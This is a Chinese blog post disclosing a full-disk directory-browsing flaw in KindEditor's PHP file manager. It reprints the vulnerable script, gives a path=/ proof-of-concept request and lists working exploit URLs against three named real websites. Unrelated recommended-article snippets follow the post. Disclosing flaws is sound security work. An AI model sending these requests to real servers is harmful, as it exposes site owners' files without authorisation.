佚名
佚名

Kindeditor特定情况可能会导致全盘浏览的漏洞

因为例子很少,开始想了下不是他们的漏洞,后面想了下,后面没有检查好用户的正常配置内容导致,还是提下吧。

下载地址:

貌似是最新版本的。

测试语言:PHP
测试漏洞文件:/kindeditor/php/file_manager_json.php
默认配置(第16行):


$root_path = $php_path . '../attached/';

当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时,如网上的一个例子:

$root_path = $php_path . '../../../upload/';

这个CMS下面的目录根本就没得这个目录,所以就造成了漏洞。

怎么造成了漏洞的呢?我们分析下。

PHP Code 复制内容到剪贴板
  2. /**  
  3.  * KindEditor PHP  
  4.  *  
  5.  * 本PHP程序是演示程序,建议不要直接在实际项目中使用。  
  6.  * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。  
  7.  *  
  8.  */  
  9.   
  10. require_once 'JSON.php';   
  11.   
  12. $php_path = dirname(__FILE__) . '/';   
  13. $php_url = dirname($_SERVER['PHP_SELF']) . '/';   
  14.   
  15. //根目录路径,可以指定绝对路径,比如 /var/www/attached/   
  16. $root_path = $php_path . '../../../upload/';   
  17. //根目录URL,可以指定绝对路径,比如 http://www.yoursite.com/attached/   
  18. $root_url = $php_url . '../../../upload/';   
  19. //图片扩展名   
  20. $ext_arr = array('gif''jpg''jpeg''png''bmp');   
  21.   
  22. //目录名   
  23. $dir_name = emptyempty($_GET['dir']) ? '' : trim($_GET['dir']);   
  24. if (!in_array($dir_namearray('''image''flash''media''file'))) {   
  25. echo "Invalid Directory name.";   
  26. exit;   
  27. }   
  28. if ($dir_name !== '') {   
  29. $root_path .= $dir_name . "/";   
  30. $root_url .= $dir_name . "/";   
  31. if (!file_exists($root_path)) {   
  32. mkdir($root_path);   
  33. }   
  34. }   
  35.   
  36. //根据path参数,设置各路径和URL   
  37. if (emptyempty($_GET['path'])) {   
  38. $current_path = realpath($root_path) . '/';   
  39. $current_url = $root_url;   
  40. $current_dir_path = '';   
  41. $moveup_dir_path = '';   
  42. else {   
  43. $current_path = realpath($root_path) . '/' . $_GET['path'];   
  44. $current_url = $root_url . $_GET['path'];   
  45. $current_dir_path = $_GET['path'];   
  46. $moveup_dir_path = preg_replace('/(.*?)[^\/]+\/$/''$1'$current_dir_path);   
  47. }   
  48. //echo realpath($root_path);   
  49. //排序形式,name or size or type   
  50. $order = emptyempty($_GET['order']) ? 'name' : strtolower($_GET['order']);   
  51.   
  52. //不允许使用..移动到上一级目录   
  53. if (preg_match('/\.\./'$current_path)) {   
  54. echo 'Access is not allowed.';   
  55. exit;   
  56. }   
  57. //最后一个字符不是/   
  58. if (!preg_match('/\/$/'$current_path)) {   
  59. echo 'Parameter is not valid.';   
  60. exit;   
  61. }   
  62. //目录不存在或不是目录   
  63. if (!file_exists($current_path) || !is_dir($current_path)) {   
  64. echo 'Directory does not exist.';   
  65. exit;   
  66. }   
  67.   
  68. //遍历目录取得文件信息   
  69. $file_list = array();   
  70. if ($handle = opendir($current_path)) {   
  71. $i = 0;   
  72. while (false !== ($filename = readdir($handle))) {   
  73. if ($filename{0} == '.'continue;   
  74. $file = $current_path . $filename;   
  75. if (is_dir($file)) {   
  76. $file_list[$i]['is_dir'] = true; //是否文件夹   
  77. $file_list[$i]['has_file'] = (count(scandir($file)) > 2); //文件夹是否包含文件   
  78. $file_list[$i]['filesize'] = 0; //文件大小   
  79. $file_list[$i]['is_photo'] = false; //是否图片   
  80. $file_list[$i]['filetype'] = ''//文件类别,用扩展名判断   
  81. else {   
  82. $file_list[$i]['is_dir'] = false;   
  83. $file_list[$i]['has_file'] = false;   
  84. $file_list[$i]['filesize'] = filesize($file);   
  85. $file_list[$i]['dir_path'] = '';   
  86. $file_ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));   
  87. $file_list[$i]['is_photo'] = in_array($file_ext$ext_arr);   
  88. $file_list[$i]['filetype'] = $file_ext;   
  89. }   
  90. $file_list[$i]['filename'] = $filename//文件名,包含扩展名   
  91. $file_list[$i]['datetime'] = date('Y-m-d H:i:s'filemtime($file)); //文件最后修改时间   
  92. $i++;   
  93. }   
  94. closedir($handle);   
  95. }   
  96.   
  97. //排序   
  98. function cmp_func($a$b) {   
  99. global $order;   
  100. if ($a['is_dir'] && !$b['is_dir']) {   
  101. return -1;   
  102. else if (!$a['is_dir'] && $b['is_dir']) {   
  103. return 1;   
  104. else {   
  105. if ($order == 'size') {   
  106. if ($a['filesize'] > $b['filesize']) {   
  107. return 1;   
  108. else if ($a['filesize'] < $b['filesize']) {   
  109. return -1;   
  110. else {   
  111. return 0;   
  112. }   
  113. else if ($order == 'type') {   
  114. return strcmp($a['filetype'], $b['filetype']);   
  115. else {   
  116. return strcmp($a['filename'], $b['filename']);   
  117. }   
  118. }   
  119. }   
  120. usort($file_list'cmp_func');   
  121.   
  122. $result = array();   
  123. //相对于根目录的上一级目录   
  124. $result['moveup_dir_path'] = $moveup_dir_path;   
  125. //相对于根目录的当前目录   
  126. $result['current_dir_path'] = $current_dir_path;   
  127. //当前目录的URL   
  128. $result['current_url'] = $current_url;   
  129. //文件数   
  130. $result['total_count'] = count($file_list);   
  131. //文件列表数组   
  132. $result['file_list'] = $file_list;   
  133.   
  134. //输出JSON字符串   
  135. header('Content-type: application/json; charset=UTF-8');   
  136. $json = new Services_JSON();   
  137. echo $json->encode($result);  


第三十八行:

$current_path = realpath($root_path) . '/';

当$root_path被realpath以后,不存在的目录会返回空,然后连接后面的'/'

$current_path所以默认就等于'/'

当提交了$_GET['path']以后,而且$_GET['path']要以'/'为结尾(有验证),所以,我们就可以构造浏览全盘目录了。

kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)

接着上面给出验证的(互联网找到几个):
先给本地的(attached文件夹被我删了):

Kindeditor特定情况可能会导致全盘浏览的漏洞_第1张图片

Kindeditor特定情况可能会导致全盘浏览的漏洞_第2张图片

互联网找到的:

http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

Kindeditor特定情况可能会导致全盘浏览的漏洞_第3张图片

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/



http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

Kindeditor特定情况可能会导致全盘浏览的漏洞_第4张图片

修复方案:再验证下绝对路径?

你可能感兴趣的:(Kindeditor特定情况可能会导致全盘浏览的漏洞)

  • 喜爱购有什么新消息?如何打造百城万店 氧惠好物
    自2020年10月起,西安喜爱购商贸商贸股份有限公司全力打造的“百城万店”新零售商业模式应运而生。在探索新零售的道路上,通过互联网、大数据、云计算、人工智能等新技术,重构“人、货、场”商业元素,秉持“舍利差赚服务”经营理念,在全国至少一百个城市的“一千户以上的中高端社区”,打造至少两万家“一区一店”社区生活超市。大家好!我是氧惠最大团队&联合创始人氧惠达人导师。氧惠佣金更高,模式更好,终端用户不流
  • 2023-04-17 你永远是傍晚中最亮的玫瑰
    今天是我们穿越的第四天,为何会这样呢?那就从四天前说起吧!在那天课上,老师说她给我们讲一个故事,在一个月黑风高的夜晚,有一群,十一二岁的,小孩在篮球场上玩,之后让我们自己想象,接下来会发生什么事情。结果就在晚上,我们一起在操场上玩时,天上的那轮明月在微风的吹拂下被乌云遮住了,就在月亮被乌云全部遮住的那个瞬间,世界都变得昏暗起来,但是我们并没有注意到这些,因为我们完全沉浸在了玩耍之中,而在三分钟之后
  • 《白月光的生日,女儿的忌日》&江雪顾城顾远TXT无删减阅读——<白月光的生日女儿的忌日> 今日推文2
    《白月光的生日,女儿的忌日》&江雪顾城顾远TXT无删减阅读——书名:《白月光的生日,女儿的忌日》主角:江雪顾城顾远阅读建议↓打开微信搜索公众号-【花儿文库】关注并回复数字:297即可快速阅读!我死死护着怀里的骨灰罐才不至于让它倒翻。闺蜜被吓得脸上瞬间没了血色。扭头看见我怀里的骨灰罐没事才松了口气。刚想冲上去理论,门口又陆陆续续走进来十个保镖。冲上来将闺蜜架起控制她的行动。闺蜜扯开嗓子想要呼救,却被
  • 定位体系第5话《实践篇-上:小品牌和新品牌,差异化塑造如何落地?》 范红运的营销讲义
    幻灯片53.jpg幻灯片54.jpg幻灯片55.jpg幻灯片56.jpg1、选择特性,创造差异化概念每个产品根据其所属品类,都具有一系列不同的特性。对顾客而言,有的特性比其他更加重要,所以必须想方设法占有最重要的特性。A、“对立面”特性:与市场领导者“相反”的特性。B、“最重要”特性:防蛀,是牙膏品类最重要的一个特性。C、“单一利益”特性:聚焦优质的“单一特性+单一利益”,会带来光环效应。D、“品
  • 1-----------10号韩媛媛个人总结 我是你的媛
    个销:18件数:37单笔2.3客单价:6171字头5.0个人总结:刚来的时候状态很好,很积极,这几天有一些累,实在是状态不好,每天积极接顾客,但是刚开始沟通不太方便,自己需要赶快调整,积极,正面的去冲刺下半个月。再就是货品,货品现在已经熟悉了,下半个月加油。每天学习02好的动作,才不白来。再就是货品方面单笔太低,应该达3,单价不高,所以分值低,所以我接下来就是高金,目标很明确,提升分值。
  • 也许,又或许是注定 二维蚂蚁
    也许,我注定该是独自一人。日下黄昏,独步堤岸。小径阴柳,情侣络绎。微纹湖面,鸳鸯成双。却泛不起一丝波澜,于我沉寂的孤独之上。也许,我注定该是流浪远方。聆听黑夜,羌笛悠扬。丝丝纤细,婉转悲凉。似轻还沉,幽怨断肠。那是美丽的姑娘,正在倾诉离别后的忧伤。于是,我注定该是沉默寡言,冲动狂乱,早已湮灭。情话无声,情愫深藏。残月为伴,对饮成双。一切无端腾起的爱与恋,皆是基于我对夜空的幻想。于是,我的远方注定寂
  • 闷的人 112233D
    躺了一会儿终于缓过来了,晚上和小伙伴们一起吃完饭走回来,离宿舍大概还有三四百米的时候,特别想上厕所,后来就加紧步伐走,越走身体的感觉就越明显,最后感觉都快要憋不住了,后来等电梯和坐电梯的时候,整个人浑身冒汗。也就几十秒的功夫,整个人感觉真的是快要憋不住了,后来下了电梯第一时间就冲进了厕所。后来发现自己浑身都出汗了,那种湿透湿透的汉,整个人也感觉特别虚,真的就是那种突然没有能量的感觉。晚上四个人一起
  • js生成器 m0dw javascript前端vue.js
    文章目录概念生成器函数如何中途结束生成器的执行使用yield*迭代可迭代对象概念生成器是ES6中新增的一种特殊的函数,所以也称为“生成器函数”。它可以更灵活地控制函数什么时候执行,什么时候暂停。生成器是一种特殊的迭代器返回值调用生成器函数返回一个新的对应的生成器,通过生成器next方法可以控制其迭代,next方法则返回下一个状态的生成器由于生成器是一种特殊的迭代器,故生成器的属性与其类似如下{va
  • php中的hmac,JavaScript通过CryptoJS等效实现php中hash_hmac函数加密raw_output配置 好想不取名 php中的hmac
    在一个项目中,客户需要从前端签名,加密插件使用的cryptoJS,使用与后端一样的签名流程(HmacSHA1后Base64.encode)发现并不能通过签名认证,签名校验方后端php代码中使用hash_hmac函数,先来看一下则会个函数的官网说明:说明hash_hmac(string$algo,string$data,string$key[,bool$raw_output=FALSE]):stri
  • Promise入门 m0dw javascript前端开发语言
    文章目录为什么使用PromisePromise介绍为什么使用Promise在ES5中使用回调函数来处理异步任务,当多个异步任务有依赖关系时(如下定时器的层层嵌套),就需要回调函数互相嵌套,当嵌套结构多了后,就出现了回调地狱的问题,难以维护setTimeout(function(){console.log('a1');setTimeout(function(){console.log('a2');s
  • 星期六 小贝灬
    图片发自App其实一到天黑了我的状态就不是很好啦,所以就在八点半的时候,看着小星星一路的完成了任务。棒棒哒~对于一个怕起早的人,果然这个压力还是好使哒~小星星说我们明天一起完成任务,一定可以的。是吗?是的!✅所有的小伙伴都加油,不过这几天小星星确实有很多改变了,她自己都感觉到啦。我呢...可能是以前就太皮了..所以还是一样的皮,就是自己有的时候有点小脾气,嘿嘿嘿.....
  • 数字孪生工厂 Frontop_2002
    一、前言近几年“数字孪生”“三维可视化”等新一代技术热词频发,以及结合近期的“元宇宙”概念的大火,各巨头纷纷入局元宇宙,也顺道带火了一波数字孪生。再加之《“十四五”数字经济发展规划》再次重点提及“数字孪生”这一技术,也使得更多的个人以及企业开始关注到这一项技术。另外在规划中也提到重点发展的就是智能制造。其实现在很多智能制造行业的巨头在早些年就已经开始重视以及布局数字孪生工厂的建设。相信有很多制造类
  • 软件测试面试大全(含答案+文档) sszmvb1234 面试软件测试面试题软件测试面试职场和发展
    Part11、你的测试职业发展是什么?测试经验越多,测试能力越高。所以我的职业发展是需要时间积累的,一步步向着高级测试工程师奔去。而且我也有初步的职业规划,前3年积累测试经验,按如何做好测试工程师的要点去要求自己,不断更新自己改正自己,做好测试任务。优势在于我对测试坚定不移的信心和热情,虽然经验还不够,但测试需要的基本技能我有信心在工作中得以发挥。2、你认为测试人员需要具备哪些素质做测试应该要有一
  • 2021年8月6号反思日记 37c089910fbe
    一.健康今天的饮食比较健康,吃了两顿有蔬菜和面试,然后健身的话大概跳了50分钟的健身操,但是状态不是很好。今天开始泡脚了,三伏天泡脚对身体非常的好,然后护肤的话今天用的是喜辽托乳膏治痘印,打算是一天刷酸,一天这个药膏。跳健身操给我的最大感受是暴汗特别的酸爽,特别的舒服,每天不跳不出汗,感觉不健康。二.个人成长今天状态不是很好,没有读书也没有做笔记,打算晚上试试看。反思日记的话,今天晚上准时写啊,还
  • Unity UI架构的道与术:从“一团乱麻”到“井然有序”(7)
    第六章:架构的回归——在理论的优雅与现实的代价之间,寻找你的最优解穿越了UI技术演进的漫漫长路,我们从一个新手的“一团乱麻”,到用MVC、MVP、MVVM这些“手术刀”,一步步地为代码建立秩序。然而,在这场对“终极优雅”的漫长求索中,我们必须在旅程的终点,停下脚步,回归到所有软件工程最朴素的本质——权衡。架构设计的真谛,不在于找到一个完美的“黄金标准”,而在于清醒地认识到每一种选择背后的代价,并为
  • Unity UI的未来之路:从UGUI到UI Toolkit的架构演进与特性剖析(1) 伽蓝_游戏 unityui架构游戏引擎游戏c#.net
    第一章:全面的特性对决——一份来自官方的详细评测报告在Unity引擎的UI开发领域,开发者主要面对两种核心技术选型:成熟且深度集成的UGUI(UnityUI)系统,以及代表未来方向、以性能和现代工作流为设计目标的UIToolkit。两者在底层架构、工作流程、性能模型和功能覆盖上存在本质差异。本章将基于详细的功能特性对比,对二者进行深入的技术分析,为开发者在项目初期做出合理的技术选型提供依据。核心差
  • Unity UI的未来之路:从UGUI到UI Toolkit的架构演进与特性剖析(2) 伽蓝_游戏 unityui架构游戏引擎游戏c#.net
    第二章:初识新王——UIToolkit的核心理念与架构剖析在第一章中,我们通过详尽的特性对比,清晰地看到了UIToolkit作为“新王”所展现出的、在性能和现代化工作流上的巨大潜力。然而,要真正理解并驾驭这把未来的“神兵利器”,我们必须更进一步,深入其内部,系统性地剖析它的核心设计理念、底层架构和关键技术特性。这一章,我们将正式踏上对UIToolkit的探索之旅,揭示其“Web技术启发”背后的真正
  • 微服务架构监控:四大黄金指标解析 AI云原生与云计算技术学院 架构微服务云原生ai
    微服务架构监控:四大黄金指标解析关键词:微服务架构、监控体系、四大黄金指标、SRE、延迟、流量、错误、饱和度摘要:本文深入解析微服务架构监控的核心方法论——四大黄金指标(延迟、流量、错误、饱和度),基于GoogleSRE最佳实践,结合具体技术实现与数学模型,阐述指标设计原理、数据采集方法、可视化实践及异常诊断逻辑。通过完整的项目实战案例,演示如何构建端到端监控体系,帮助技术团队建立可观测性基线,提
  • 2018-11-30 小邢麻麻
    图片发自App图片发自App图片发自App明天又休息了,所以作业有点多。今晚没做完,明天上午完成的今天下午的时候,王老师拿了四张表,分给了几个写字比较好看的人,期中就有我,而且还是第一个给我的。王老师说,邢佳怡,我看你写字挺好的,你就把这张表填一下吧。我一听,很高兴,这是一个光荣的任务,我一定要认真完成。这也是对我认真写字的一种认可。加油今晚读的是,哪吒闹海。主人公哪吒是他母亲怀了他三年才生下来的
  • 中原焦点中27期 伍丹分享第366天 简单_9c75
    转发:真正的自律,从不是一蹴而就,运动就是提升自律最便捷的方式之一。每天坚持锻炼,并把这份坚持延续到工作中,能保持强大的专注力和自制力,从而不断取得进展。当别人还在打游戏时,你已经完成了健身;当别人还对闹铃满腹牢骚时,你已经完成了晨跑。随着运动习惯的养成,你对生活的掌控也更加容易。当一个人能够保持自律,他的人生也会因此而拥有更多的选择权。你流的每一滴汗,都不会被辜负;你在运动上花费的每一秒,都不会
  • 2022-03-19 做自己喜欢的事
    时间过得真快,一天又过去了。今天没有赚到什么钱,只赚了300多,在这种情况下能保住性命就不错了,何谈赚钱。反正比厂里上班还是要自由一点。虽然辛苦,但是我一直在坚持,有付出就有收获。我打心眼里高兴。财富是慢慢开始积累的,也许这就是我的开始……
  • 油猴正确开启方法Please enable developer mode to allow userscript injection.
    以下步骤缺一不可步骤扩展程序管理扩展程序启用开发者模式启用油猴油猴详情(能打开的全部打开)允许运行用户脚本在无痕模式下启用允许访问文件网址建议不用的时候都关闭结果之后就可以打开油猴插件发现最上面的蓝色提示不见了“Pleaseenabledevelopermodetoallowuserscriptinjection.”可以正常使用安装的插件了
  • 「Chrome 开发环境快速屏蔽 CORS 跨域限制详细教程」*
    Chrome开发环境快速屏蔽CORS跨域限制【超详细教程】为什么需要临时屏蔽CORS?在日常前后端开发中,我们经常会遇到这样的报错:Accesstofetchat'https://api.example.com'fromorigin'http://localhost:3000'hasbeenblockedbyCORSpolicy.或者类似:AccesstoXMLHttpRequestat'http
  • 281129-李晏林-2022/10/6【day2】 尘心_aa8c
    总目标是什么?总目标是什么最近3年的成为销售高手要具备的能务:销售主手的标准:1、超强的执行力,2、见客户的胆量3、口才4、分析问题的能务5、推荐产品的话术、6做增值服务的能务7、谈判的能务8、解决客种宊发问题的能力9、控制心态的能力、10、送小礼物的能务关键词:胆量、口才、分析问题、产品话术、小礼物、增值服务、谈判、突发问题、控制心态执行力。以上是成为销售高手的关键能力。汇总分类:心态:目标细分
  • 浅学——心理学基础 Ciudadnatal
    心理学基础三大思维模式1.从直觉思维到理性思维。三只猴子的实验,人类的传统延续有相通之处,一方面我们为了生存,我们头脑你保存了无数规则和思维方式。另一方面,我们很少去探究每一条规则背后的逻辑和适用情景。学习心理学的最重要的目的之一,就是让我们学会对传统、对权威、对惯例保持疑问,学会刨根问底地去追问为什么。2.从自我中心思维到开放思维。由于大脑不完备的进化和发育,给我们带来的自我为中心的思维模式。指
  • 假期第二天:逛超市+游泳 剪烛西窗_d70d
    2020年5月2日星期日晴亲爱的毛毛,今天你说要去要想游乐园玩,我想了想还是决定去商业大厦购物。带着你俩太忙,你爸年底发的百大卡都没用,结果最后被疯抢一空。家里洗发水没了,我想我的商业大厦卡也不保险,抓紧去消费。我们带上你爷爷一起帮忙拿东西,开车去了西城。一上午各种买买买,超市里买了东西后,我在美都汇给你和果果买了衣服,你买了个书包,果果买了个平衡车。总之我们上午买得很开心。中午妈妈实在累了,看着
  • Google Chrome 谷歌浏览器全部版本集合 邓草 chrome前端谷歌浏览器
    GoogleChrome谷歌浏览器全部版本集合CollectionofallsoftwareversionsofGoogleChrome.项目介绍本项目为GoogleChrome谷歌浏览器的全部版本集合,方便大家下载旧版本使用。因为Gitee项目限制仓库1G大小,所以许多谷歌浏览器版本无法上传。想下载全部的谷歌浏览器版本,请移步Github:https://github.com/dengcao/c
  • API签名认证详解 派大星在做蟹黄包 后端
    本质签发签名认证签名(使用签名或校验码。这就像一些短信接口的key一样别纠结名字)accessKeysecretKey/appKeyappSecret一样1.思考(场景)如果说我们把这个接口提供给开发者,但是我们现在是不是根本不知道是谁来调用的。假如说我们的服务器只能允许100个人来调用。假如说有一个攻击者来了,他就刷量了,他想疯狂的刷我的服务器,那是不是非常的不安全?另外一方面就是你的服务器的性
  • Xss漏洞总结
    一、XSS漏洞简介XSS(Cross-SiteScripting,跨站脚本攻击)是一种常见的Web前端安全漏洞,其主要危害对象是网站的访问用户。攻击者通过在网页中注入恶意脚本代码(如JavaScript、Flash等),诱使用户访问后在其浏览器中执行这些代码,从而达到窃取数据、控制会话等攻击目的。二、XSS漏洞原理XSS的根本原因在于服务器未对用户提交的输入内容进行严格过滤和转义处理,导致用户提供
  • 从XSS Payload学习浏览器解码 caker丶 XSS-labsXSSxss学习javascript
    从XSSPayload学习浏览器解码HTML解析URL解析JavaScript解析案例解析总结作为一个浏览器在解析一篇HTML文档时主要有三个处理过程,每个解析器负责解码和解析HTML文档中它所对应的部分,下面我将按照解码顺序依次讲解。HTMl解析URL解析JavaScript解析HTML解析一个HTML解析器作为一个状态机,它从输入流中获取字符并按照转换规则转换到另一种状态。在解析过程中,任何时
  • jdk tomcat 环境变量配置 Array_06 javajdktomcat
    Win7 下如何配置java环境变量 1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 3。分别配置高级环境变量。   电脑-->右击属性-->高级环境变量-->环境变量。 分别配置 : path    &nbs
  • Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 javaspring
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
  • LeetCode[位运算] - #136 数组中的单一数 Cwind java题解位运算LeetCodeAlgorithm
    原题链接:#136 Single Number 要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 难度:中等 分析: 题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
  • qq登陆界面开发 15700786134 qq
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: public class First {         public void initul(){        jf=ne
  • Linux的程序包管理器RPM 被触发 linux
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
  • socket通信遇到EOFException 肆无忌惮_ EOFException
    java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
  • 基于spring的web项目定时操作 知了ing javaWeb
    废话不多说,直接上代码,很简单 配置一下项目启动就行 1,web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
  • 树形结构的数据库表Schema设计 矮蛋蛋 schema
    原文地址: http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488     程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
  • maven将jar包和源码一起打包到本地仓库 alleni123 maven
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!! 百合不是茶
    类 File File是指文件和目录路径名的抽象表示形式。 1,何为文件: 标准文件(txt doc mp3...) 目录文件(文件夹) 虚拟内存文件   2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
  • Spring注入有继承关系的类(2) bijian1013 javaspring
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
  • 30岁转型期你能否成为成功人士 bijian1013 成长励志
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • 【Velocity四】Velocity与Java互操作 bit1129 velocity
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础,      POJO    package com.tom.servlets; public
  • 【Hive十一】Hive数据倾斜优化 bit1129 hive
    什么是Hive数据倾斜问题   操作:join,group by,count distinct 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 原因:key分布不均匀 倾斜度衡量:平均记录数超过50w且
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua csrf
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-3.求子数组的最大和 bylijinnan java
    package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和 题目描述: 输入一个整形数组,数组里有正数也有负数。 数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。 求所有子数组的和的最大值。要求时间复杂度为O(n)。 例如输入的数组为1, -2, 3, 10, -4,
  • Netty源码学习-FileRegion bylijinnan javanetty
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: //pipeline(没有诸如“FileRegionEncoder”的handler): public ChannelPipeline ge
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板Zero Clipboard
    Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法 首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js
  • 单例模式 cuishikuan 单例模式
    第一种(懒汉,线程不安全): public class Singleton {   2     private static Singleton instance;   3     pri
  • spring+websocket的使用 dalan_123
    一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
  • 细节问题:ZEROFILL的用法范围。 dcj3sjt126com mysql
    1、zerofill把月份中的一位数字比如1,2,3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
  • Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。   一、Activity跳转 方法一Intent intent = new Intent(A.this, B.class); startActivity(intent)   方法二Intent intent = new Intent();intent.setCla
  • jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
  • Android 应用程序开关GPS gqdy365 android
    要在应用程序中操作GPS开关需要权限: <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 1、方法一:将项目放到Android源码中编译; 2、方法二:网上有人说cl
  • Windows上调试MapReduce zhiquanliu mapreduce
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
  • 如何看待一些知名博客推广软文的行为? justjavac 博客
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态: 当初求种像条狗,如今撸完嫌人丑 当初搜贴像条犬,如今读完嫌人软 你为啥感觉不舒服呢? 难道非得要作者把自己的劳动成果免费给你用,你才舒服? 就如同 Google 关闭了 Gooled Reader,那是
  • sql优化总结 macroli sql
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢!   要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。   一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
  • Linux Oracle中常遇到的一些问题及命令总结 超声波 oraclelinux
    1.linux更改主机名   (1)#hostname oracledb    临时修改主机名 (2) vi /etc/sysconfig/network   修改hostname (3) vi /etc/hosts        修改IP对应的主机名   2.linux重启oracle实例及监听的各种方法 (注意操作的顺序应该是先监听,后数据库实例) &nbs
  • hive函数大全及使用示例 superlxw1234 hadoophive函数
      具体说明及示例参 见附件文档。     文档目录:   目录 一、关系运算: 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
  • Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
    4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示 两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他